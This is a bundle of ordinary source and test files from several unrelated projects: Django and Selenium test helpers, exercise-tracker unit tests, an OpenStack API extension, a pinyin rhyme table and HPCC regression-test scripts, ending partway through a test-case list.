expense = Expense.objects.create()
response = self.client.post(f'/expenses/edit/{expense.id}', data={
'description': 'expense 1',
'amount': '-0.40',
'date': today_input
})
self.assertRedirects(response, '/expenses/edit')
# NOTE(steve): we also need to test that the invalid edits show
# error messages
```
#### File: mindful-spending/functional_tests/base.py
```python
from django.contrib.staticfiles.testing import StaticLiveServerTestCase
from selenium.common.exceptions import WebDriverException
from selenium import webdriver
import os
import time
from datetime import date
MAX_WAIT = 20
def wait(fn):
def modified_fn(*args, **kwargs):
start_time = time.time()
while True:
try:
return fn(*args, **kwargs)
except (AssertionError, WebDriverException) as e:
if time.time() - start_time > MAX_WAIT:
raise e
time.sleep(0.5)
return modified_fn
class FunctionalTest(StaticLiveServerTestCase):
def setUp(self):
self.browser = webdriver.Firefox()
self.staging_server = os.environ.get('STAGING_SERVER')
if self.staging_server:
from .server_tools import reset_database
self.live_server_url = 'http://' + self.staging_server
reset_database(self.staging_server)
def tearDown(self):
self.browser.quit()
super().tearDown()
@wait
def wait_for(self, fn):
return fn()
```
#### File: mindful-spending/functional_tests/server_tools.py
```python
from fabric.api import run
from fabric.context_managers import settings
def _get_manage_dot_py(host):
return f'~/sites/{host}/virtualenv/bin/python ~/sites/{host}/manage.py'
def reset_database(host):
manage_dot_py = _get_manage_dot_py(host)
with settings(host_string=f'steve@{host}'):
run(f'{manage_dot_py} flush --noinput')
```
|
{
"source": "jeckt/trainer",
"score": 3
}
|
#### File: trainer/tests/test_trainer.py
```python
import sys
import os
import filecmp
sys.path.insert(0, os.path.abspath('../trainer'))
sys.path.insert(0, os.path.abspath('./trainer'))
import unittest
import shutil
from trainer import Trainer
from exercises import Exercises, Exercise
DATA_PATH = os.path.dirname(__file__)
TEST_DATA_FILE = os.path.join(DATA_PATH, 'test_dataset_1.pkl')
TEST_ADD_DATA = os.path.join(DATA_PATH, 'new_exercises.csv')
TEST_OUT_FILE = os.path.join(DATA_PATH, 'test_dataset_1.csv')
TEST_OUT_FILE_COPY = os.path.join(DATA_PATH, 'test_dataset_1_copy.csv')
class TrainerConnectionTestCases(unittest.TestCase):
"""A set of unit test for testing connection"""
def test_test_data_loaded(self):
trainer = Trainer(conn=TEST_DATA_FILE)
self.assertTrue(trainer._is_data_loaded,
"Trainer could not load test data")
def test_data_does_not_exist(self):
with self.assertRaises(IOError) as context:
trainer = Trainer(conn='fail_data')
self.assertTrue('Could not connect to data' in context.exception)
def test_data_loaded(self):
trainer = Trainer()
self.assertTrue(trainer._is_data_loaded,
"Trainer could not load test data")
# TODO(steve): should test cases be refactored?
# moving test cases into small test suites may be
# better identification or errors.
class TrainerTestCases1(unittest.TestCase):
"""A set of unit tests for the trainer class"""
def setUp(self):
# NOTE(steve): the performance impact
# of copying a data for each test will
# be an issue with larger test data sets
self._TMP_DATA_FILE = "_tmp_data.pkl"
i = 0
while os.path.isfile(self._TMP_DATA_FILE):
self._TMP_DATA_FILE = "_tmp_data_{}.pkl".format(i)
i += 1
shutil.copyfile(TEST_DATA_FILE, self._TMP_DATA_FILE)
self.trainer = Trainer(conn=self._TMP_DATA_FILE)
def tearDown(self):
if os.path.isfile(self._TMP_DATA_FILE):
os.remove(self._TMP_DATA_FILE)
if os.path.isfile(TEST_OUT_FILE_COPY):
os.remove(TEST_OUT_FILE_COPY)
def test_trainer_output_exercises_to_csv(self):
self.trainer.output_exercises_to_csv(TEST_OUT_FILE_COPY)
self.assertTrue(filecmp.cmp(TEST_OUT_FILE, TEST_OUT_FILE_COPY))
def test_trainer_bulk_add_exercises_from_csv(self):
tasks = self.trainer.get_all_exercises()
self.assertEqual(len(tasks), 10)
self.trainer.add_exercises_from_csv(TEST_ADD_DATA)
new_tasks = self.trainer.get_all_exercises()
self.assertEqual(len(new_tasks), 13)
def test_trainer_bulk_add_exercises_from_csv_no_file(self):
with self.assertRaises(IOError) as context:
self.trainer.add_exercises_from_csv('fake.csv')
error_msg = "no such file or directory: '{}'".format('fake.csv')
self.assertTrue(error_msg in context.exception)
def test_trainer_update_exercise(self):
all_tasks = self.trainer.get_all_exercises()
ex = all_tasks[2]
new_ex = Exercise("Fake update on exercise")
self.trainer.update_exercise(ex, new_ex)
new_all_tasks = self.trainer.get_all_exercises()
self.assertTrue(new_ex in new_all_tasks)
self.assertTrue(ex not in new_all_tasks)
def test_trainer_update_non_existent_exercise(self):
old_ex = Exercise("not in set")
new_ex = Exercise("it won't work dude")
with self.assertRaises(ValueError) as context:
self.trainer.update_exercise(old_ex, new_ex)
error_msg = "{} not in exercises".format(old_ex)
self.assertTrue(error_msg in context.exception)
def test_trainer_update_persists_to_data_storage(self):
all_tasks = self.trainer.get_all_exercises()
ex = all_tasks[2]
new_ex = Exercise("Fake update on exercise")
self.assertTrue(new_ex not in all_tasks)
self.assertTrue(ex in all_tasks)
self.trainer.update_exercise(ex, new_ex)
new_trainer = Trainer(conn=self._TMP_DATA_FILE)
new_all_tasks = new_trainer.get_all_exercises()
self.assertTrue(new_ex in new_all_tasks)
self.assertTrue(ex not in new_all_tasks)
def test_trainer_returns_exercises_of_type_exercise(self):
tasks = self.trainer.get_all_exercises()
ex = tasks[0]
self.assertIsInstance(ex, Exercise)
def test_trainer_exercises_of_type_exercises(self):
self.assertIsInstance(self.trainer._exercises, Exercises)
def test_get_all_exercises(self):
tasks = self.trainer.get_all_exercises();
self.assertEqual(len(tasks), 10)
def test_get_new_list_of_exercises(self):
tasks = self.trainer.get_new_list(5)
self.assertEqual(len(tasks), 5)
def test_not_enough_exercises_to_generate_new_list(self):
with self.assertRaises(Exception) as context:
tasks = self.trainer.get_new_list(15)
error_msg = "15 exercises requested but only 10 available"
self.assertTrue(error_msg in context.exception)
def test_get_new_list_does_not_change_all_exercises(self):
all_tasks = self.trainer.get_all_exercises()
self.assertEqual(len(all_tasks), 10)
tasks = self.trainer.get_new_list(7)
new_all_tasks = self.trainer.get_all_exercises()
self.assertEqual(len(new_all_tasks), 10)
# it is safe to assume that we have a unique set of
# programming exercises
self.assertTrue(all_tasks == new_all_tasks,
"List of all tasks has been mutated!")
def test_add_new_exercise(self):
all_tasks = self.trainer.get_all_exercises()
self.assertEqual(len(all_tasks), 10)
exercise = Exercise("new random exercise")
self.trainer.add_exercise(exercise)
new_all_tasks = self.trainer.get_all_exercises()
self.assertEqual(len(new_all_tasks), 11)
self.assertIn(exercise, new_all_tasks)
def test_add_duplicate_exercise(self):
all_tasks = self.trainer.get_all_exercises()
exercise = all_tasks[4]
with self.assertRaises(Exception) as context:
self.trainer.add_exercise(exercise)
error_msg = "Exercise already exists. Exercise: {}".format(exercise)
self.assertTrue(error_msg in context.exception)
def test_add_new_exercise_persists_to_data_storage(self):
exercise = Exercise("new random exercise")
self.trainer.add_exercise(exercise)
old_all_tasks = self.trainer.get_all_exercises()
new_trainer = Trainer(conn=self.trainer._conn)
new_all_tasks = new_trainer.get_all_exercises()
# NOTE(steve): may be slow when data set size increases
self.assertTrue(old_all_tasks == new_all_tasks,
"Changes aren't persisting to data storage")
def test_get_all_exercises_returns_a_copy_only(self):
all_tasks = self.trainer.get_all_exercises()
self.assertEqual(len(all_tasks), 10)
ex = Exercise('exercise should not be included')
all_tasks.append(ex)
new_all_tasks = self.trainer.get_all_exercises()
self.assertEqual(len(new_all_tasks), 10)
def test_remove_existing_exercise(self):
old_all_tasks = self.trainer.get_all_exercises()
self.assertEqual(len(old_all_tasks), 10)
exercise = old_all_tasks[2]
self.trainer.remove_exercise(exercise)
new_all_tasks = self.trainer.get_all_exercises()
self.assertEqual(len(new_all_tasks), 9)
def test_remove_exercise_not_in_trainer(self):
exercise = "non existent exercise"
with self.assertRaises(Exception) as context:
self.trainer.remove_exercise(exercise)
error_msg = "Exercise does not exist. "
error_msg += "Cannot remove exercise. "
error_msg += "Exercise: {}""".format(exercise)
self.assertTrue(error_msg in context.exception)
def test_remove_exercise_persists_to_data_storage(self):
old_all_tasks = self.trainer.get_all_exercises()
exercise = old_all_tasks[3]
self.trainer.remove_exercise(exercise)
updated_all_tasks = self.trainer.get_all_exercises()
new_trainer = Trainer(conn=self.trainer._conn)
new_all_tasks = new_trainer.get_all_exercises()
# NOTE(steve): may be slow when data set size increases
self.assertTrue(updated_all_tasks == new_all_tasks,
"Changes aren't persisting to data storage")
if __name__ == '__main__':
unittest.main()
```
|
{
"source": "jeckxie/gxzw-nova",
"score": 2
}
|
#### File: openstack/compute/wstvms.py
```python
from oslo_log import log as logging
from nova.api.openstack import extensions
from nova.api.openstack import wsgi
from nova.policies import wstvms as al_policies
from ics_sdk import session as ics_session
LOG = logging.getLogger(__name__)
ALIAS = "wstvms"
class WstvmsController(wsgi.Controller):
"""The Wstvms API controller for the OpenStack API."""
def __init__(self):
self.ics_manager = ics_session.get_session()
super(WstvmsController, self).__init__()
@extensions.expected_errors(404)
def wstvmsmessage(self, req, id):
#ics_vms = self.ics_manager.vm.get_vms_in_host(id)
print id
return self.ics_manager.vm.get_info(id)
class Wstvms(extensions.V21APIExtensionBase):
"""Admin-only cluster administration."""
name = "Wstvms"
alias = ALIAS
version = 1
def get_resources(self):
m_actions = {'wstvmsmessage': 'GET'}
resources = [extensions.ResourceExtension(ALIAS, WstvmsController(),
member_actions=m_actions)]
return resources
def get_controller_extensions(self):
return []
```
|
{
"source": "jecky100000/Tong-Music",
"score": 2
}
|
#### File: jecky100000/Tong-Music/rhyme_searching.py
```python
from xpinyin import Pinyin
rhyme_list = [
['a','ba','ca','cha','da','fa','ga','gua','ha','hua','jia','ka','kua','la','lia','ma','na','pa','qia','sa','sha','shua','ta','wa','xia','ya','za','zha','zhua'],
['ai','bai','cai','chai','dai','gai','guai','hai','huai','kai','kuai','lai','mai','nai','pai','sai','shai','shuai','tai','wai','zai','zhai'],
['an','ban','can','chan','chuan','cuan','dan','duan','fan','gan','guan','han','huan','kan','kuan','lan','luan','man','nan','nuan','pan','ran','ruan','san','shan','shuan','suan','tan','tuan','wan','zan','zhan','zhuan','zuan'],
['ang','bang','cang','chang','chuang','dang','fang','gang','guang','hang','huang','jiang','kang','kuang','lang','liang','mang','nang','niang','pang','qiang','rang','sang','shang','shuang','tang','wang','xiang','yang','zang','zhang','zhuang'],
['ao','bao','biao','cao','chao','dao','diao','gao','hao','jiao','kao','lao','liao','mao','miao','nao','niao','pao','piao','qiao','rao','sao','shao','tao','tiao','xiao','yao','zao','zhao'],
['bei','cui','chui','dei','dui','ei','fei','gei','gui','hei','hui','kui','lei','mei','nei','pei','rui','shui','sui','tui','wei','zei','zhui','zui'],
['ben','cen','ceng','chen','cheng','chun','cun','dun','en','fen','gen','gun','hen','heng','hun','jun','ken','keng','kun','lun','men','nen','neng','pen','ren','reng','run','sen','seng','shen','sheng','shun','sun','teng','tun','wen','zen','zeng','zhen','zheng','zhun','zun'],
['beng','chong','cong','deng','dong','eng','feng','geng','gong','hong','jiong','kong','leng','long','meng','nong','peng','qiong','rong','song','tong','weng','xiong','yong','zhong','zong'],
['bi','di','ji','ju','li','lv','mi','ni','nv','pi','qi','qu','ti','xi','xu','yi','yu'],
['bian','dian','jian','juan','lian','mian','nian','pian','qian','quan','tian','xian','xuan','yan','yuan'],
['bie','die','jie','jue','lie','lve','mie','nie','nve','pie','qie','que','tie','xie','xue','ye','yue'],
['bin','bing','ding','jin','jing','lin','ling','min','ming','nin','ning','pin','ping','qin','qing','qun','ting','xin','xing','xun','yin','ying','yun'],
['bo','chou','chou','cou','cuo','diu','dou','duo','fo','fou','gou','guo','hou','huo','jiu','kou','kuo','liu','lou','luo','miu','mo','mou','niu','nou','nuo','o','ou','po','pou','qiu','rou','ruo','shou','shuo','sou','suo','tou','tuo','wo','xiu','you','zhou','zhuo','zou','zuo'],
['bu','chu','cu','du','fu','gu','hu','ku','lu','mu','nu','pu','ru','shu','su','tu','wu','zhu','zu'],
['ce','che','de','e','er','ge','he','ke','le','me','ne','re','se','she','te','ze','zhe'],
['chi','ci','ri','shi','si','zhi','zi']
]
def rhyme(line):
test = Pinyin()
b=str(test.get_pinyin(line[-1]))
number = 0
for rhymes in range(len(rhyme_list)):
if b in rhyme_list[rhymes]:
number = rhymes + 1
break
number /= len(rhyme_list)
# print(number)
return number
```
|
{
"source": "jeclrsg/HPCC-Platform",
"score": 2
}
|
#### File: esp/esdlcmd/esdlcmd-test.py
```python
__version__ = "0.1"
import argparse
import filecmp
import inspect
import logging
import os
import subprocess
import sys
import traceback
from pathlib import Path
DESC = "Test the functioning of the esdl command. Version " + __version__
class DirectoryCompare(filecmp.dircmp):
"""
Compare the content of dir1 and dir2. In contrast with filecmp.dircmp, this
subclass compares the content of files with the same path.
"""
def phase3(self):
"""
Find out differences between common files.
Ensure we are using content comparison with shallow=False.
"""
fcomp = filecmp.cmpfiles(self.left, self.right, self.common_files,
shallow=False)
self.same_files, self.diff_files, self.funny_files = fcomp
class TestRun:
"""Common settings for all TestCases in a run."""
def __init__(self, stats, exe_path, output_base, test_path):
self.exe_path = exe_path
self.output_base = output_base
self.test_path = test_path
self.stats = stats
class TestCaseBase:
"""Settings for a specific test case."""
def __init__(self, run_settings, name, command, esdl_file, service, xsl_path, options=None):
self.run_settings = run_settings
self.name = name
self.command = command
self.esdl_path = (self.run_settings.test_path / 'inputs' / esdl_file)
self.service = service
self.xsl_path = xsl_path
self.options = options
self.output_path = Path(self.run_settings.output_base) / name
self.args = [
str(run_settings.exe_path),
self.command,
self.esdl_path,
self.service,
'--xslt',
self.xsl_path,
'--outdir',
# must contain a trailing slash
str(self.output_path) + '/'
]
if options:
self.args.extend(options)
self.result = None
def run_test(self):
safe_mkdir(self.output_path)
logging.debug("Test %s args: %s", self.name, str(self.args))
self.result = subprocess.run(self.args, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
if self.result.returncode != 0:
logging.error('Error running "esdl %s" for test "%s": %s', self.command, self.name, self.result.stderr)
success = False
else:
success = self.validate_results()
self.run_settings.stats.add_count(success)
def validate_results(self):
"""Compare test case results to the known key.
Return True if the two are identical or False otherwise.
"""
logging.debug('TestCaseBase implementation called, no comparison run')
return False
class TestCaseXSD(TestCaseBase):
"""Test case for the wsdl or xsd commands.
Both generate a single file output, so test validation compares
the contents of the output file with the key file.
The path the xsl files not include the 'xslt' directory. The command
assumes it needs to apped that directory itself.
"""
def __init__(self, run_settings, name, command, esdl_file, service, xsl_path, options=None):
super().__init__(run_settings, name, command, esdl_file, service, xsl_path, options)
def validate_results(self):
"""Compare test case results to the known key.
Return True if the two are identical or False otherwise.
"""
suffix = '.' + self.command
outName = (self.output_path / self.service.lower()).with_suffix(suffix)
key = (self.run_settings.test_path / 'key' / self.name).with_suffix(suffix)
if (not key.exists()):
logging.error('Missing key file %s', str(key))
return False
if (not outName.exists()):
logging.error('Missing output for test %s', self.name)
return False
if (not filecmp.cmp(str(key), str(outName))):
logging.debug('Comparing key %s to output %s', str(key), str(outName))
logging.error('Test failed: %s', self.name)
return False
else:
logging.debug('Passed: %s', self.name)
return True
class TestCaseCode(TestCaseBase):
"""Test case for the cpp or java commands.
Both generate a directory full of output, so test validation compares
the contents of the output directory with the key directory.
The path the xsl files must be appended with 'xslt/' for the command
to find the xslt files.
"""
def __init__(self, run_settings, name, command, esdl_file, service, xsl_path, options=None):
# must end in a slash esdl command doesn't
# add a slash before appending the file name
xsl_cpp_path = str((xsl_path / 'xslt'))
xsl_cpp_path += '/'
super().__init__(run_settings, name, command, esdl_file, service, xsl_cpp_path, options)
def is_same(self, dir1, dir2):
"""
Compare two directory trees content.
Return False if they differ, True is they are the same.
"""
compared = DirectoryCompare(dir1, dir2)
if (compared.left_only or compared.right_only or compared.diff_files
or compared.funny_files):
return False
for subdir in compared.common_dirs:
if not self.is_same(os.path.join(dir1, subdir), os.path.join(dir2, subdir)):
return False
return True
def validate_results(self):
# output of cpp or java is a directory named 'source'
outName = (self.output_path / 'source')
key = (self.run_settings.test_path / 'key' / self.name)
if (not key.exists()):
logging.error('Missing key file %s', str(key))
return False
if (not outName.exists()):
logging.error('Missing output for test %s', self.name)
return False
if (not self.is_same(str(key), str(outName))):
logging.debug('Comparing key %s to output %s', str(key), str(outName))
logging.error('Test failed: %s', self.name)
return False
else:
logging.debug('Passed: %s', self.name)
return True
class Statistics:
def __init__(self):
self.successCount = 0
self.failureCount = 0
def add_count(self, success):
if (success):
self.successCount += 1
else:
self.failureCount += 1
def parse_options():
"""Parse any command-line options given returning both
the parsed options and arguments.
"""
parser = argparse.ArgumentParser(description=DESC)
parser.add_argument('testroot',
help='Path of the root folder of the esdlcmd testing project')
parser.add_argument('-o', '--outdir',
help='Directory name of output for tests',
default='esdlcmd-test-output')
parser.add_argument('-e', '--esdlpath',
help='Path to the esdl executable to test')
parser.add_argument('-x', '--xslpath',
help='Path to the folder containing xslt/*.xslt transforms',
default='/opt/HPCCSystems/componentfiles/')
parser.add_argument('-d', '--debug',
help='Enable debug logging of test cases',
action='store_true', default=False)
args = parser.parse_args()
return args
def safe_mkdir(path):
"""Create a new directory, catching all exceptions.
The directory may already exist, and any missing intermediate
directories are created. The script is exited if unrecoverable
exceptions are caught.
"""
try:
path.mkdir(parents=True, exist_ok=True)
except FileExistsError as e:
pass
except (FileNotFoundError, PermissionError) as e:
logging.error("'%s' \nExit." % (str(e)))
exit(-1)
except:
print("Unexpected error:"
+ str(sys.exc_info()[0])
+ " (line: "
+ str(inspect.stack()[0][2])
+ ")" )
traceback.print_stack()
exit(-1)
def main():
args = parse_options()
stats = Statistics()
test_path = Path(args.testroot)
exe_path = Path(args.esdlpath) / 'esdl'
xsl_base_path = Path(args.xslpath)
if (args.debug):
loglevel = logging.DEBUG
else:
loglevel=logging.INFO
logging.basicConfig(level=loglevel, format='[%(levelname)s] %(message)s')
stats = Statistics()
run_settings = TestRun(stats, exe_path, args.outdir, test_path)
test_cases = [
# wsdl
TestCaseXSD(run_settings, 'wstest-wsdl-default', 'wsdl', 'ws_test.ecm', 'WsTest',
xsl_base_path),
TestCaseXSD(run_settings, 'wstest-wsdl-noarrayof', 'wsdl', 'ws_test.ecm', 'WsTest',
xsl_base_path, ['--no-arrayof']),
TestCaseXSD(run_settings, 'wstest-wsdl-iv1', 'wsdl', 'ws_test.ecm', 'WsTest',
xsl_base_path, ['-iv', '1']),
TestCaseXSD(run_settings, 'wstest-wsdl-iv2', 'wsdl', 'ws_test.ecm', 'WsTest',
xsl_base_path, ['-iv', '2']),
TestCaseXSD(run_settings, 'wstest-wsdl-iv3', 'wsdl', 'ws_test.ecm', 'WsTest',
xsl_base_path, ['-iv', '3']),
TestCaseXSD(run_settings, 'wstest-wsdl-uvns', 'wsdl', 'ws_test.ecm', 'WsTest',
xsl_base_path, ['-iv', '3', '-uvns']),
TestCaseXSD(run_settings, 'wstest-wsdl-allannot', 'wsdl', 'ws_test.ecm', 'WsTest',
xsl_base_path, ['--annotate', 'all']),
TestCaseXSD(run_settings, 'wstest-wsdl-noannot', 'wsdl', 'ws_test.ecm', 'WsTest',
xsl_base_path, ['-iv', '1', '--annotate', 'none']), # -iv for smaller output
TestCaseXSD(run_settings, 'wstest-wsdl-opt', 'wsdl', 'ws_test.ecm', 'WsTest',
xsl_base_path, ['-iv', '1', '-opt', 'developer']),
# --noopt isn't fully implemented, enable test case once it is
#TestCaseXSD(run_settings, 'wstest-wsdl-noopt', 'wsdl', 'ws_test.ecm', 'WsTest',
# xsl_base_path, ['-iv', '1', '--noopt']),
TestCaseXSD(run_settings, 'wstest-wsdl-tns', 'wsdl', 'ws_test.ecm', 'WsTest',
xsl_base_path, ['-iv', '1', '-tns', 'urn:passed:name:space']),
# xsd
TestCaseXSD(run_settings, 'wstest-xsd-default', 'xsd', 'ws_test.ecm', 'WsTest',
xsl_base_path),
TestCaseXSD(run_settings, 'wstest-xsd-noarrayof', 'xsd', 'ws_test.ecm', 'WsTest',
xsl_base_path, ['--no-arrayof']),
TestCaseXSD(run_settings, 'wstest-xsd-iv1', 'xsd', 'ws_test.ecm', 'WsTest',
xsl_base_path, ['-iv', '1']),
TestCaseXSD(run_settings, 'wstest-xsd-iv2', 'xsd', 'ws_test.ecm', 'WsTest',
xsl_base_path, ['-iv', '2']),
TestCaseXSD(run_settings, 'wstest-xsd-iv3', 'xsd', 'ws_test.ecm', 'WsTest',
xsl_base_path, ['-iv', '3']),
TestCaseXSD(run_settings, 'wstest-xsd-uvns', 'xsd', 'ws_test.ecm', 'WsTest',
xsl_base_path, ['-iv', '3', '-uvns']),
TestCaseXSD(run_settings, 'wstest-xsd-allannot', 'xsd', 'ws_test.ecm', 'WsTest',
xsl_base_path, ['--annotate', 'all']),
TestCaseXSD(run_settings, 'wstest-xsd-noannot', 'xsd', 'ws_test.ecm', 'WsTest',
xsl_base_path, ['-iv', '1', '--annotate', 'none']), # -iv for smaller output
TestCaseXSD(run_settings, 'wstest-xsd-opt', 'xsd', 'ws_test.ecm', 'WsTest',
xsl_base_path, ['-iv', '1', '-opt', 'developer']),
# --noopt isn't fully implemented, enable test case once it is
#TestCaseXSD(run_settings, 'wstest-xsd-noopt', 'xsd', 'ws_test.ecm', 'WsTest',
# xsl_base_path, ['-iv', '1', '--noopt']),
TestCaseXSD(run_settings, 'wstest-xsd-tns', 'xsd', 'ws_test.ecm', 'WsTest',
xsl_base_path, ['-iv', '1', '-tns', 'urn:passed:name:space']),
# cpp
TestCaseCode(run_settings, 'wstest-cpp-installdir', 'cpp', 'ws_test.ecm', 'WsTest',
xsl_base_path)
]
for case in test_cases:
case.run_test()
logging.info('Success count: %d', stats.successCount)
logging.info('Failure count: %d', stats.failureCount)
if __name__ == "__main__":
main()
```
#### File: esp/wudetails/wutest.py
```python
import wucommon
import logging
import filecmp
from wucommon import TestCase
def execTestCase(jobname, wuid, tcase, tcasename):
testfilename = jobname + '_' + tcasename
logging.debug('Executing %s',testfilename)
wuresp = wutest.makeWuDetailsRequest(testfilename, wuid, tcase)
outfile = (wutest.resultdir / testfilename).with_suffix('.json')
if (outfile.exists()): outfile.unlink()
with outfile.open(mode='w') as f:
print (tcase, file=f)
print (wuresp, file=f)
keyfile = (wutest.tcasekeydir / testfilename).with_suffix('.json')
if (not keyfile.exists()):
logging.error('Missing key file %s', str(keyfile))
return False
# Compare actual and expectetd
if (not filecmp.cmp(str(outfile),str(keyfile))):
logging.error('Regression check Failed: %s', testfilename)
return False
else:
logging.debug('PASSED %s', testfilename)
return True
###############################################################################
print('WUDetails Regression (wutest.py)')
print('--------------------------------')
print('')
requiredJobs = ( ('childds1', ('roxie','thor','hthor')),
('dedup_all', ('roxie','hthor')),
('sort', ('roxie','thor','hthor')),
('key', ('roxie','thor','hthor')),
('dict1', ('roxie','thor','hthor')),
('indexread2-multiPart(true)',('roxie', 'thor','hthor')),
('sets', ('roxie','thor','hthor')) )
maskFields = ('Definition','DefinitionList','SizePeakMemory', 'WhenFirstRow', 'TimeElapsed', 'TimeTotalExecute', 'TimeFirstExecute', 'TimeLocalExecute',
'WhenStarted', 'TimeMinLocalExecute', 'TimeMaxLocalExecute', 'TimeAvgLocalExecute', 'SkewMinLocalExecute', 'SkewMaxLocalExecute',
'NodeMaxLocalExecute', 'NodeMaxDiskWrites', 'NodeMaxLocalExecute', 'NodeMaxLocalExecute', 'NodeMaxSortElapsed', 'NodeMinDiskWrites',
'NodeMinLocalExecute', 'NodeMinLocalExecute', 'NodeMinLocalExecute', 'NodeMinSortElapsed', 'SkewMaxDiskWrites', 'SkewMaxLocalExecute',
'SkewMaxLocalExecute', 'SkewMaxSortElapsed', 'SkewMinDiskWrites', 'SkewMinLocalExecute', 'SkewMinLocalExecute', 'SkewMinSortElapsed',
'TimeAvgSortElapsed', 'TimeMaxSortElapsed', 'TimeMinSortElapsed')
maskMeasureTypes = ('ts','ns', 'skw', 'node')
wutest = wucommon.WuTest(maskFields, maskMeasureTypes, True, True)
scopeFilter = wutest.scopeFilter
nestedFilter = wutest.nestedFilter
propertiesToReturn = wutest.propertiesToReturn
scopeOptions = wutest.scopeOptions
propertyOptions = wutest.propertyOptions
extraProperties = wutest.extraProperties
# Test cases
#scopeFilter(MaxDepth='999', Scopes=set(), Ids=set(), ScopeTypes=set()),
#nestedFilter(Depth='999', ScopeTypes=set()),
#propertiesToReturn(AllProperties='1', MinVersion='0', Measure='', Properties=set(), ExtraProperties=set()),
#scopeOptions(IncludeMatchedScopesInResults='1', IncludeScope='1', IncludeId='1', IncludeScopeType='1'),
#propertyOptions(IncludeName='1', IncludeRawValue='1', IncludeFormatted='1', IncludeMeasure='1', IncludeCreator='1', IncludeCreatorType='1')
TestCases = [
TestCase(
scopeFilter(MaxDepth='999'),
nestedFilter(),
propertiesToReturn(AllProperties='1'),
scopeOptions(IncludeMatchedScopesInResults='1', IncludeScope='1', IncludeId='1', IncludeScopeType='1'),
propertyOptions(IncludeName='1', IncludeRawValue='1', IncludeFormatted='1', IncludeMeasure='1', IncludeCreator='1', IncludeCreatorType='1')
),
TestCase(
scopeFilter(MaxDepth='999'),
nestedFilter(),
propertiesToReturn(AllStatistics='1'),
scopeOptions(IncludeMatchedScopesInResults='1', IncludeScope='1', IncludeId='1', IncludeScopeType='1'),
propertyOptions(IncludeName='1', IncludeRawValue='1', IncludeMeasure='1', IncludeCreator='1', IncludeCreatorType='1')
),
TestCase(
scopeFilter(MaxDepth='999'),
nestedFilter(),
propertiesToReturn(AllAttributes='1'),
scopeOptions(IncludeMatchedScopesInResults='1', IncludeScope='1', IncludeId='1', IncludeScopeType='1'),
propertyOptions(IncludeName='1', IncludeRawValue='1', IncludeMeasure='1', IncludeCreator='1', IncludeCreatorType='1')
),
TestCase(
scopeFilter(MaxDepth='999'),
nestedFilter(),
propertiesToReturn(AllHints='1'),
scopeOptions(IncludeMatchedScopesInResults='1', IncludeScope='1', IncludeId='1', IncludeScopeType='1'),
propertyOptions(IncludeName='1', IncludeRawValue='1', IncludeMeasure='1', IncludeCreator='1', IncludeCreatorType='1')
),
TestCase(
scopeFilter(MaxDepth='999', Scopes={'Scope':'w1:graph1'}),
nestedFilter(),
propertiesToReturn(AllProperties='1'),
scopeOptions(IncludeMatchedScopesInResults='1', IncludeScope='1', IncludeId='1', IncludeScopeType='1'),
propertyOptions(IncludeName='1', IncludeRawValue='1', IncludeMeasure='1', IncludeCreator='1', IncludeCreatorType='1')
),
TestCase(
scopeFilter(MaxDepth='1', ScopeTypes={'ScopeType':'graph'}),
nestedFilter(Depth='1'),
propertiesToReturn(AllProperties='1'),
scopeOptions(IncludeMatchedScopesInResults='1', IncludeScope='1', IncludeId='1', IncludeScopeType='1'),
propertyOptions(IncludeName='1', IncludeRawValue='1', IncludeMeasure='1', IncludeCreator='1', IncludeCreatorType='1')
),
TestCase(
scopeFilter(MaxDepth='999', ScopeTypes={'ScopeType':'subgraph'}),
nestedFilter(),
propertiesToReturn(AllStatistics='1'),
scopeOptions(IncludeMatchedScopesInResults='1', IncludeScope='1', IncludeId='1', IncludeScopeType='1'),
propertyOptions(IncludeName='1', IncludeRawValue='1', IncludeMeasure='1', IncludeCreator='1', IncludeCreatorType='1')
),
TestCase(
scopeFilter(MaxDepth='999', ScopeTypes={'ScopeType':'global'}),
nestedFilter(),
propertiesToReturn(AllStatistics='1'),
scopeOptions(IncludeMatchedScopesInResults='1', IncludeScope='1', IncludeId='1', IncludeScopeType='1'),
propertyOptions(IncludeName='1', IncludeRawValue='1', IncludeMeasure='1', IncludeCreator='1', IncludeCreatorType='1')
),
TestCase(
scopeFilter(MaxDepth='999', ScopeTypes={'ScopeType':'activity'}),
nestedFilter(),
propertiesToReturn(AllStatistics='1'),
scopeOptions(IncludeMatchedScopesInResults='1', IncludeScope='1', IncludeId='1', IncludeScopeType='1'),
propertyOptions(IncludeName='1', IncludeRawValue='1', IncludeMeasure='1', IncludeCreator='1', IncludeCreatorType='1')
),
TestCase(
scopeFilter(MaxDepth='999', ScopeTypes={'ScopeType':'allocator'}),
nestedFilter(),
propertiesToReturn(AllStatistics='1'),
scopeOptions(IncludeMatchedScopesInResults='1', IncludeScope='1', IncludeId='1', IncludeScopeType='1'),
propertyOptions(IncludeName='1', IncludeRawValue='1', IncludeMeasure='1', IncludeCreator='1', IncludeCreatorType='1')
),
TestCase(
scopeFilter(MaxDepth='2'),
nestedFilter(),
propertiesToReturn(AllStatistics='1', AllAttributes='1'),
scopeOptions(IncludeMatchedScopesInResults='1', IncludeScope='1', IncludeId='1', IncludeScopeType='1'),
propertyOptions()
),
TestCase(
scopeFilter(MaxDepth='1'),
nestedFilter(Depth='1'),
propertiesToReturn(AllStatistics='1', AllAttributes='1'),
scopeOptions(),
propertyOptions()
),
TestCase(
scopeFilter(MaxDepth='2'),
nestedFilter(),
propertiesToReturn(Properties={'Property':['WhenStarted','WhenCreated']}),
scopeOptions(IncludeMatchedScopesInResults='1', IncludeScope='1', IncludeId='1', IncludeScopeType='1'),
propertyOptions()
),
TestCase(
scopeFilter(MaxDepth='2'),
nestedFilter(),
propertiesToReturn(Measure='ts'),
scopeOptions(IncludeMatchedScopesInResults='1', IncludeScope='1', IncludeId='1', IncludeScopeType='1'),
propertyOptions(IncludeName='1', IncludeRawValue='1', IncludeMeasure='1', IncludeCreator='1', IncludeCreatorType='1')
),
TestCase(
scopeFilter(MaxDepth='2'),
nestedFilter(),
propertiesToReturn(Measure='cnt'),
scopeOptions(IncludeMatchedScopesInResults='1', IncludeScope='1', IncludeId='1', IncludeScopeType='1'),
propertyOptions()
),
TestCase(
scopeFilter(MaxDepth='999', ScopeTypes={'ScopeType':'subgraph'}),
nestedFilter(),
propertiesToReturn(AllStatistics='1', AllAttributes='1'),
scopeOptions(IncludeMatchedScopesInResults='1'),
propertyOptions(IncludeName='1', IncludeRawValue='1', IncludeMeasure='1', IncludeCreator='1', IncludeCreatorType='1')
),
TestCase(
